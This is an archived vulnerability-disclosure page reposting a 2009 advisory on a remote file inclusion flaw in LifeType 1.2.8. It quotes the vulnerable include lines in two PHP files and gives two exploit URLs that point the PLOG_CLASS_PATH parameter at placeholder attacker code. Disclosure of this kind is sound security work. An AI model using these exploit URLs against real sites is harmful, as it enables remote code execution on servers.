Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [oCERT-2009-010] mimeTeX and mathTeX buffer overflows and command injection

  MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION --ILIAS LMS <= 3.10.7/3.9.9-->

  Admin News Tools 2.5 Remote File Download Vulnerability

  Virtualmin Multiple Vulnerabilities

From:Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date:16 июля 2009 г.
Subject:LifeType 1.2.8 Remote File Inclusion Vulnerability

/================================================================================
===============================================================\
 |                                                                                  
            
 |  [o] LifeType 1.2.8 Remote File Inclusion Vulnerability                                      
 |                                                                                  
            
 |       Software : LifeType 1.2.8
 |       Vendor   : http://lifetype.net/
 |       Author   : Cru3l.b0y                                                                   
 |       Contact  : Cru3l.b0y@deltahacking.net                                                  
 |               Home     : WwW.DeltaHacking.Net                                               

|================================================================================
===============================================================|
 |                                                                                  
            
 |  [o] Vulnerable file                                                                         
 |                                                                                  
            
 |       install/installation.class.php                                                         
 |                                                                                  
            
 |        include_once( PLOG_CLASS_PATH."config/config.properties.php" );                       
|
 |                                                                                  
            
 |       class/bootstrap.php                                                                    
 |                                                                                  
            
 |                include( PLOG_CLASS_PATH."class/object/loader.class.php" );                   
 |                                                                                  
            
 |                                                                                  
            
 |  [o] Exploit                                                                                 

 |                                                                                  
            
 |       http://localhost/[path]/install/installation.class.
php?PLOG_CLASS_PATH=[evilcode]      
 |       http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]                 
 |                                                                                  
            

|================================================================================
===============================================================|

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород